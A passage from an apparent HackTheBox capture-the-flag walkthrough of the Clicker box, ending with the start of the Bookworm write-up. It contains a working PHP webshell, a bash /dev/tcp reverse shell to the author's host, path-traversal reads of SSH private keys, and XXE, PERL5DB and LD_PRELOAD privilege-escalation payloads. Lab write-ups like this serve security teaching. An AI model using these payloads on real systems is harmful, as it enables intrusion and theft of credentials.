$s .= ' <td>' . $currentplayer["level"] . '</td>';
$s .= ' </tr>';
foreach ($data as $player) {
$s .= ' <tr>';
$s .= ' <th scope="row">' . $player["nickname"] . '</th>';
$s .= ' <td>' . $player["clicks"] . '</td>';
$s .= ' <td>' . $player["level"] . '</td>';
$s .= ' </tr>';
}
I’ve noticed that nickname is set the same as username on registration, but there’s nothing to prevent me from updating it via the mass assignment:
Now if I export again:
Putting that all together, I’ll change my nickname to be a PHP webshell:
I’ll do an export with extension=php:
Now I’ll visit http://clicker.htb/exports/top_players_zhfppp54.php?cmd=id and get execution:
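For reference, the mass-assignment request that plants the webshell nickname can be built with Python’s urllib (a sketch only — the authenticated session cookie and the follow-up export request are omitted):

```python
from urllib.parse import urlencode

# Build the save_game.php URL that overwrites nickname with a webshell
webshell = '<?php system($_GET["cmd"]); ?>'
params = {"clicks": "4", "level": "0", "nickname": webshell}
url = "http://clicker.htb/save_game.php?" + urlencode(params)
print(url)
```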
To get a shell, I’ll start nc listening on 443 and visit http://clicker.htb/exports/top_players_7pbbwdqy.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.14.6/443%200%3E%261%27:
oxdf@hacky$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.232 44604
bash: cannot set terminal process group (1211): Inappropriate ioctl for device
bash: no job control in this shell
www-data@clicker:/var/www/clicker.htb/exports$
I’ll do the standard shell upgrade:
www-data@clicker:/var/www/clicker.htb/exports$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@clicker:/var/www/clicker.htb/exports$ ^Z
[1]+ Stopped nc -lnvp 443
oxdf@hacky$ stty raw -echo; fg
nc -lnvp 443
reset
reset: unknown terminal type unknown
Terminal type? screen
www-data@clicker:/var/www/clicker.htb/exports$
There’s one other user with a home directory on the box:
www-data@clicker:/home$ ls
jack
www-data@clicker:/home$ ls jack/
ls: cannot open directory 'jack/': Permission denied
Unsurprisingly, www-data has no access.
I could look at the web stuff in www-data’s home directory, but it doesn’t prove useful here.
In /opt there’s a directory and a shell script:
www-data@clicker:/opt$ ls -l
total 8
drwxr-xr-x 2 jack jack 4096 Jul 21 2023 manage
-rwxr-xr-x 1 root root 504 Jul 20 2023 monitor.sh
monitor.sh starts with a check that it is running as root, so I’ll come back to that.
In manage, there’s a README.txt and an ELF binary:
www-data@clicker:/opt/manage$ ls -l
total 20
-rw-rw-r-- 1 jack jack 256 Jul 21 2023 README.txt
-rwsrwsr-x 1 jack jack 16368 Feb 26 2023 execute_query
www-data@clicker:/opt/manage$ file execute_query
execute_query: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=cad57695aba64e8b4f4274878882ead34f2b2d57, for GNU/Linux 3.2.0, not stripped
The README.txt has instructions for the binary:
www-data@clicker:/opt/manage$ cat README.txt
Web application Management
Use the binary to execute the following task:
- 1: Creates the database structure and adds user admin
- 2: Creates fake players (better not tell anyone)
- 3: Resets the admin password
- 4: Deletes all users except the admin
The binary does require arguments:
www-data@clicker:/opt/manage$ ./execute_query
ERROR: not enough arguments
Passing 1 shows the SQL that’s run:
www-data@clicker:/opt/manage$ ./execute_query 1
mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
CREATE TABLE IF NOT EXISTS players(username varchar(255), nickname varchar(255), password varchar(255), role varchar(255), clicks bigint, level int, PRIMARY KEY (username))
--------------
--------------
INSERT INTO players (username, nickname, password, role, clicks, level)
VALUES ('admin', 'admin', 'ec9407f758dbed2ac510cac18f67056de100b1890f5bd8027ee496cc250e3f82', 'Admin', 999999999999999999, 999999999)
ON DUPLICATE KEY UPDATE username=username
--------------
It seems to be calling mysql and feeding it .sql dump files as input. Running strings on the binary bolsters this theory:
www-data@clicker:/opt/manage$ strings execute_query | grep -F .sql
create.sql
populate.sql
reset_password.sql
clean.sql
I’ll base64 encode the binary, copy it back to my host, and decode it to get a copy:
oxdf@hacky$ vim execute_query.b64
oxdf@hacky$ base64 -d execute_query.b64 > execute_query
oxdf@hacky$ file execute_query
execute_query: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=cad57695aba64e8b4f4274878882ead34f2b2d57, for GNU/Linux 3.2.0, not stripped
oxdf@hacky$ md5sum execute_query
f09a05ad831b9a4c7cf8cce4d7ae4b81 execute_query
That matches what’s on Clicker:
www-data@clicker:/opt/manage$ md5sum execute_query
f09a05ad831b9a4c7cf8cce4d7ae4b81 execute_query
I’ll open the binary in Ghidra and take a look. The entire program is in main, which is:
undefined8 main(int argc,char **argv)
{
long lVar1;
int res;
undefined8 return_val;
char *filename_buffer;
size_t strlen_res;
size_t strlen_res2;
char *__dest;
long in_FS_OFFSET;
char queries_dir [20];
char local_78 [81];
lVar1 = *(long *)(in_FS_OFFSET + 0x28);
if (argc < 2) {
puts("ERROR: not enough arguments");
return_val = 1;
}
else {
res = atoi(argv[1]);
filename_buffer = (char *)calloc(0x14,1);
switch(res) {
case 0:
puts("ERROR: Invalid arguments");
return_val = 2;
goto LAB_001015e1;
case 1:
strncpy(filename_buffer,"create.sql",0x14);
break;
case 2:
strncpy(filename_buffer,"populate.sql",0x14);
break;
case 3:
strncpy(filename_buffer,"reset_password.sql",0x14);
break;
case 4:
strncpy(filename_buffer,"clean.sql",0x14);
break;
default:
strncpy(filename_buffer,argv[2],0x14);
}
queries_dir[0] = '/'; // /home/jack/queries/\0
queries_dir[1] = 'h';
queries_dir[2] = 'o';
...[snip]...
queries_dir[17] = 's';
queries_dir[18] = '/';
queries_dir[19] = '\0';
strlen_res = strlen(queries_dir);
strlen_res2 = strlen(filename_buffer);
__dest = (char *)calloc(strlen_res2 + strlen_res + 1,1);
strcat(__dest,queries_dir);
strcat(__dest,filename_buffer);
setreuid(1000,1000);
res = access(__dest,4);
if (res == 0) {
cmd_str[0] = '/'; // cmd_str = /usr/bin/mysql -u clicker_db_user
cmd_str[1] = 'u'; // --password='clicker_db_password'
cmd_str[2] = 's'; // clicker -v < \0
cmd_str[3] = 'r';
...[snip]...
cmd_str[78] = '<';
cmd_str[79] = ' ';
cmd_str[80] = '\0';
strlen_res = strlen(local_78);
strlen_res2 = strlen(filename_buffer);
filename_buffer = (char *)calloc(strlen_res2 + strlen_res + 1,1);
strcat(filename_buffer,local_78);
strcat(filename_buffer,__dest);
system(filename_buffer);
}
else {
puts("File not readable or not found");
}
return_val = 0;
}
LAB_001015e1:
if (lVar1 == *(long *)(in_FS_OFFSET + 0x28)) {
return return_val;
}
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
It gets a filename, appends it to the mysql command so that it’s passed as input, and runs it with -v, which echoes each statement from the file.
I’ll also note that while case 0 is a failure, the default case runs with argv[2] as the filename.
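One detail worth noting from the decompilation: strncpy copies at most 0x14 (20) bytes of argv[2], so any traversal path has to fit in 20 characters. A small Python mirror of just the string handling (hypothetical, not the binary’s actual code):

```python
QUERIES_DIR = "/home/jack/queries/"

def build_path(arg):
    # strncpy(filename_buffer, argv[2], 0x14) caps the name at 20 bytes
    return QUERIES_DIR + arg[:20]

print(build_path("../../../etc/passwd"))           # 19 chars - fits
print(build_path("../../../etc/ssh/sshd_config"))  # silently truncated
```

That’s why short targets like ../../../etc/passwd and ../.ssh/id_rsa work, while longer paths get cut off.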
I’ll try to read a file using execute_query with type 223 (or any other input that hits the default case) and directory traversal to get the file I want. It’s not able to read user.txt:
www-data@clicker:/opt/manage$ ./execute_query 223 ../user.txt
File not readable or not found
But /etc/passwd works:
www-data@clicker:/opt/manage$ ./execute_query 223 ../../../etc/passwd
mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
jack:x:1000:1000:jack:/home/jack:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
_rpc:x:115:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:116:65534::/var/lib/nfs:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
--------------
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
' at line 1
I can also get jack’s SSH private key:
www-data@clicker:/opt/manage$ ./execute_query 223 ../.ssh/id_rsa
mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
-----BEGIN OPENSSH PRIVATE KEY---
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAs4eQaWHe45iGSieDHbraAYgQdMwlMGPt50KmMUAvWgAV2zlP8/1Y
...[snip]...
LsOxRu230Ti7tRBOtV153KHlE4Bu7G/d028dbQhtfMXJLu96W1l3Fr98pDxDSFnig2HMIi
lL4gSjpD/FjWk9AAAADGphY2tAY2xpY2tlcgECAwQFBg==
-----END OPENSSH PRIVATE KEY---
--------------
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-----BEGIN OPENSSH PRIVATE KEY---
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAA' at line 1
Interestingly, if I try to use this key just as is, I get:
oxdf@hacky$ ssh -i ~/keys/clicker-jack jack@clicker.htb
Load key "/home/oxdf/keys/clicker-jack": error in libcrypto
jack@clicker.htb's password:
I’ll have to add two “-” characters to the first and last lines of the key (no idea why those got truncated), and then it works:
oxdf@hacky$ ssh -i ~/keys/clicker-jack jack@clicker.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-84-generic x86_64)
...[snip]...
jack@clicker:~$
And I can get user.txt:
jack@clicker:~$ cat user.txt
fa528539************************
jack has two sudo entries configured:
jack@clicker:~$ sudo -l
Matching Defaults entries for jack on clicker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User jack may run the following commands on clicker:
(ALL : ALL) ALL
(root) SETENV: NOPASSWD: /opt/monitor.sh
With a password, jack can run any command as any user. Without a password, jack can run monitor.sh with the SETENV tag, which allows jack to pass environment variables through sudo into the script.
The monitor.sh script is relatively simple:
#!/bin/bash
if [ "$EUID" -ne 0 ]
then echo "Error, please run as root"
exit
fi
set PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
unset PERL5LIB;
unset PERLLIB;
data=$(/usr/bin/curl -s http://clicker.htb/diagnostic.php?token=secret_diagnostic_token);
/usr/bin/xml_pp <<< $data;
if [[ $NOSAVE == "true" ]]; then
exit;
else
timestamp=$(/usr/bin/date +%s)
/usr/bin/echo $data > /root/diagnostic_files/diagnostic_${timestamp}.xml
fi
It starts by making sure it’s running as root. Then it sets the PATH and unsets some Perl-related env variables, presumably as security measures to prevent hijacking xml_pp, which is Perl-based:
jack@clicker:/opt$ file /usr/bin/xml_pp
/usr/bin/xml_pp: Perl script text executable
Then it uses curl to request the diagnostic.php page from the site, passing the token “secret_diagnostic_token”, sends the result through xml_pp, and saves the output to a file in /root.
xml_pp (short for XML pretty printer) prints XML data in a nicer format.
diagnostic.php starts by checking that the correct token is passed as a GET parameter:
<?php
if (isset($_GET["token"])) {
if (strcmp(md5($_GET["token"]), "ac0e5a6a3a50b5639e69ae6d8cd49f40") != 0) {
header("HTTP/1.1 401 Unauthorized");
exit;
}
}
else {
header("HTTP/1.1 401 Unauthorized");
die;
}
“secret_diagnostic_token” is the right password here:
jack@clicker:/opt$ echo -n 'secret_diagnostic_token' | md5sum
ac0e5a6a3a50b5639e69ae6d8cd49f40 -
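The same comparison is easy to reproduce with Python’s hashlib (checking against the hash hardcoded in diagnostic.php):

```python
import hashlib

token = "secret_diagnostic_token"
digest = hashlib.md5(token.encode()).hexdigest()
print(digest == "ac0e5a6a3a50b5639e69ae6d8cd49f40")  # True
```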
It then defines a function that converts an array to XML, gathers a bunch of stats about the server, and returns them as XML:
$db_server="localhost";
$db_username="clicker_db_user";
$db_password="clicker_db_password";
$db_name="clicker";
$connection_test = "OK";
try {
$pdo = new PDO("mysql:dbname=$db_name;host=$db_server", $db_username, $db_password, array(PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION));
} catch(PDOException $ex){
$connection_test = "KO";
}
$data=[];
$data["timestamp"] = time();
$data["date"] = date("Y/m/d h:i:sa");
$data["php-version"] = phpversion();
$data["test-connection-db"] = $connection_test;
$data["memory-usage"] = memory_get_usage();
$env = getenv();
$data["environment"] = $env;
$xml_data = new SimpleXMLElement('<?xml version="1.0"?><data></data>');
array_to_xml($data,$xml_data);
$result = $xml_data->asXML();
print $result;
?>
Running the script without root fails as expected, while running it with sudo returns the XML:
jack@clicker:/opt$ /opt/monitor.sh
Error, please run as root
jack@clicker:/opt$ sudo /opt/monitor.sh
<?xml version="1.0"?>
<data>
<timestamp>1706213156</timestamp>
<date>2024/01/25 08:05:56pm</date>
<php-version>8.1.2-1ubuntu2.14</php-version>
<test-connection-db>OK</test-connection-db>
<memory-usage>392704</memory-usage>
<environment>
<APACHE_RUN_DIR>/var/run/apache2</APACHE_RUN_DIR>
<SYSTEMD_EXEC_PID>1173</SYSTEMD_EXEC_PID>
<APACHE_PID_FILE>/var/run/apache2/apache2.pid</APACHE_PID_FILE>
<JOURNAL_STREAM>8:26785</JOURNAL_STREAM>
<PATH>/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin</PATH>
<INVOCATION_ID>fa242859cf764eb9975e7efc5d6d3c37</INVOCATION_ID>
<APACHE_LOCK_DIR>/var/lock/apache2</APACHE_LOCK_DIR>
<LANG>C</LANG>
<APACHE_RUN_USER>www-data</APACHE_RUN_USER>
<APACHE_RUN_GROUP>www-data</APACHE_RUN_GROUP>
<APACHE_LOG_DIR>/var/log/apache2</APACHE_LOG_DIR>
<PWD>/</PWD>
</environment>
</data>
Giving a user control over environment variables is dangerous, and while the author tries to prevent some attacks by setting the PATH and unsetting two Perl-related variables, there are still multiple ways to get root on this box. I’ll show three (with the intended path in yellow):
flowchart TD;
I[Shell as jack]-->A(sudo monitor.sh)
A-->B(Perl Debug);
B-->C(Code Execution);
C-->D[root Shell];
A-->E(http_proxy);
E-->F(XXE File Read);
F-->G(root SSH Key);
G-->D;
A-->H(LD_PRELOAD);
H-->C;
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
linkStyle 1,2,3,8,9 stroke-width:2px,stroke:#4B9CD3,fill:none;
There’s a flag in Perl, -d, that enables the debugger:
-d[:debugger] run program under debugger
In this script, I can’t set flags on the command line, but I can set the PERL5OPT environment variable, which also sets options. So if I set PERL5OPT=-d, the debugger will be invoked.
There’s another variable, PERL5DB, that sets the code to run in a BEGIN block when the debugger starts.
There is a somewhat famous example of a bug in the Exim mail server from 2016 where it allowed the user to set environment variables in this way, CVE-2016-1531:
Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
POCs for this vulnerability show these variables used in exploitation:
To run this, I’ll just set these environment variables to touch a file:
jack@clicker:~$ sudo PERL5OPT=-d PERL5DB='system("touch /0xdf")' /opt/monitor.sh
No DB::DB routine defined at /usr/bin/xml_pp line 9.
No DB::DB routine defined at /usr/lib/x86_64-linux-gnu/perl-base/File/Temp.pm line 870.
END failed--call queue aborted.
The 0xdf
file now exists owned by root in the system root:
jack@clicker:~$ ls -l /0xdf
-rw-r--r-- 1 root root 0 Jan 25 20:32 /0xdf
To get a shell, I’ll create a copy of bash
and make it SetUID and SetGID:
jack@clicker:~$ sudo PERL5OPT=-d PERL5DB='system("cp /bin/bash /tmp/0xdf; chown root:root /tmp/0xdf; chmod 6777 /tmp/0xdf")' /opt/monitor.sh
No DB::DB routine defined at /usr/bin/xml_pp line 9.
No DB::DB routine defined at /usr/lib/x86_64-linux-gnu/perl-base/File/Temp.pm line 870.
END failed--call queue aborted.
The file now exists, is owned by root, and is SetUID and SetGID:
jack@clicker:~$ ls -l /tmp/0xdf
-rwsrwsrwx 1 root root 1396520 Jan 25 20:36 /tmp/0xdf
I’ll run it (not forgetting -p
to not drop privs) and get an effective root shell:
jack@clicker:~$ /tmp/0xdf -p
0xdf-5.1# id
uid=1000(jack) gid=1000(jack) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),1000(jack)
And the flag:
0xdf-5.1# cat /root/root.txt
c9b19375************************
The intended path for this box is to use the http_proxy
variable. This is an option for curl
that is detailed on the curl
man page:
I’ll modify my Burp Proxy options to listen on all interfaces, rather than just localhost:
Now on running sudo http_proxy=http://10.10.14.6:8080 /opt/monitor.sh
, the request and response show up in my Burp Proxy history:
This allows me to modify the request and the response.
I’ll enable response interception in Burp, and when I run the command with http_proxy
set to my Burp instance, it’ll hang on that intercepted request, which I’ll let go through. Then it hangs on the response:
I’ll grab a basic XXE payload (for example from here) and update the response:
On clicking “Forward”, the file shows up in the terminal:
jack@clicker:~$ sudo http_proxy=http://10.10.14.6:8080 /opt/monitor.sh
<?xml version="1.0"?>
<!DOCTYPE replace [
<!ENTITY ent SYSTEM "/etc/passwd">
]>
<file>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
jack:x:1000:1000:jack:/home/jack:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
_rpc:x:115:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:116:65534::/var/lib/nfs:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
</file>
There are a handful of files I could try to read. root.txt
would be a start, but I’d rather go for a shell. There happens to be a root SSH key when I set the XML to:
<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "/root/.ssh/id_rsa">]>
<file>&ent;</file>
The result is:
jack@clicker:~$ sudo http_proxy=http://10.10.14.6:8080 /opt/monitor.sh
<?xml version="1.0"?>
<!DOCTYPE replace [
<!ENTITY ent SYSTEM "/root/.ssh/id_rsa">
]>
<file>-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAmQBWGDv1n5tAPBu2Q/DsRCIZoPhthS8T+uoYa6CL+gKtJJGok8xC
...[snip]...
UyOYOJc1Mv8zkAAAAMcm9vdEBjbGlja2VyAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
</file>
With that, I’m able to save it to a file on my host, and SSH in:
oxdf@hacky$ vim ~/keys/clicker-root
oxdf@hacky$ chmod 600 ~/keys/clicker-root
oxdf@hacky$ ssh -i ~/keys/clicker-root root@clicker.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-84-generic x86_64)
...[snip]...
root@clicker:~#
Ippsec actually pointed this one out to me (though I’m embarrassed I missed it in hindsight). If I can set almost any environment variable, why not LD_PRELOAD
? LD_PRELOAD
is an environment variable that tells the dynamic linker to load a given shared library before any others when executing a program. This HackTricks page has exploit code.
I’ll create a simple C program that unsets the LD_PRELOAD
variable (to prevent loops), sets the privileges to root user and group, and runs bash
:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
There are no compilation tools on the host, but since both it and my VM are Ubuntu-based, compiling locally shouldn’t cause issues. I’ll generate a .so
file:
oxdf@hacky$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
I’ll copy this file up to Clicker into /tmp
. Now I can run with LD_PRELOAD
pointing at this shared object and it will run bash
:
jack@clicker:~$ sudo LD_PRELOAD=/tmp/shell.so /opt/monitor.sh
root@clicker:/home/jack#
Bookworm starts with a gnarly exploit chain combining cross-site scripting, insecure upload, and insecure direct object reference vulnerabilities to identify an HTTP endpoint that allows for file download. In this endpoint, I’ll find that if multiple files are requested, I can use a directory traversal to return arbitrary files in the returned Zip archive. I’ll use that to leak database creds that also work for SSH on the box. The next user is running a dev webserver that manages ebook format conversion. I’ll abuse this with symlinks to get arbitrary write, write an SSH public key, and get access. For root, I’ll abuse a SQL injection in a label-creating script to do PostScript injection to read and write files as root. In Beyond Root, I’ll look at the Express webserver from the foothold, and how it was vulnerable and where it wasn’t.
Name | Bookworm Play on HackTheBox |
---|---|
Release Date | 27 May 2023 |
Retire Date | 20 Jan 2024 |
OS | Linux |
Base Points | Insane [50] |
Rated Difficulty | |
Radar Graph | |
01:31:16 | |
02:12:34 | |
Creator |
nmap
finds two open TCP ports, SSH (22) and HTTP (80):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.215
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-13 15:21 EST
Nmap scan report for 10.10.11.215
Host is up (0.11s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
oxdf@hacky$ nmap -p 22,80 -sCV 10.10.11.215
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-13 15:23 EST
Nmap scan report for 10.10.11.215
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://bookworm.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.09 seconds
Based on the OpenSSH version, the host is likely running Ubuntu 20.04 focal. On 80, it’s redirecting to bookworm.htb
. I’ll fuzz for subdomains with ffuf
, but it doesn’t find anything. I’ll add bookworm.htb
to my /etc/hosts
file, and re-run nmap
to check for anything new, but there’s nothing interesting.
The site is a book store:
/shop
offers books and prices:
Clicking on a book gives a page with details at /shop/[id]
:
Trying to add a book to my “basket” (or cart) redirects to /login
with a message saying I must be logged in:
I’m able to register and create an account. Then I can add to my basket, and go to checkout:
There’s an important note here. They are no longer offering free e-book downloads, but users who purchased while downloads were free can still download them.
I’ll complete the order:
The profile page has the ability to update my information, upload an avatar, and see my order history:
The HTTP headers show that this is a JavaScript Express web server:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 13 Jan 2024 20:31:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: Express
Content-Security-Policy: script-src 'self'
ETag: W/"cdd-GfQn3pwdx5hNePMjMr3ZkL72DBY"
Content-Length: 3293
The 404 page is the default Express 404 page as well:
There is a cookie and a cookie signature:
The cookie is just base64, which decodes to:
{
  "flashMessage":{},
  "user":{
    "id":14,
    "name":"0xdf",
    "avatar":"/static/img/uploads/14"
  }
}
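Reproducing that decode is straightforward. A quick Python sketch, using the session cookie value from my browser:

```python
import base64
import json

# Session cookie value as set by the server (from the Set-Cookie header)
cookie = ("eyJmbGFzaE1lc3NhZ2UiOnt9LCJ1c2VyIjp7ImlkIjoxNCwibmFtZSI6IjB4ZGYi"
          "LCJhdmF0YXIiOiIvc3RhdGljL2ltZy91cGxvYWRzLzE0In19")

session = json.loads(base64.b64decode(cookie))
print(session["user"]["name"])    # 0xdf
print(session["user"]["avatar"])  # /static/img/uploads/14
```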
If I could compromise the secret that’s used with the signature, I could potentially forge cookies, but that won’t come into play here.
I’ll also note that the cookies are marked HttpOnly when set
, which means I won’t be able to exfil them via XSS:
I’ll run feroxbuster
against the site:
oxdf@hacky$ feroxbuster -u http://bookworm.htb
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://bookworm.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 10l 15w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 90l 292w 3293c http://bookworm.htb/
302 GET 1l 4w 23c http://bookworm.htb/logout => http://bookworm.htb/
200 GET 62l 140w 2040c http://bookworm.htb/login
200 GET 82l 197w 3093c http://bookworm.htb/register
200 GET 239l 675w 10778c http://bookworm.htb/shop
301 GET 10l 16w 179c http://bookworm.htb/static => http://bookworm.htb/static/
200 GET 62l 140w 2034c http://bookworm.htb/Login
302 GET 1l 4w 28c http://bookworm.htb/profile => http://bookworm.htb/login
302 GET 1l 4w 28c http://bookworm.htb/basket => http://bookworm.htb/login
301 GET 10l 16w 185c http://bookworm.htb/static/js => http://bookworm.htb/static/js/
301 GET 10l 16w 187c http://bookworm.htb/static/css => http://bookworm.htb/static/css/
